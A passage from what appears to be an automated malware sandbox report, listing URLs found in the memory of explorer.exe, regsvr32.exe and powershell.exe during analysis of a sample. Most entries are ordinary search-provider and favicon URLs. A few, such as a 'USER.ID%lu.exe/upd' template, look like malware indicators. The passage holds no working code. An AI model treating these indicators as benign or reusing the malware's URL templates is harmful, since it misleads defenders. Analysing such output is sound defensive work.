          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
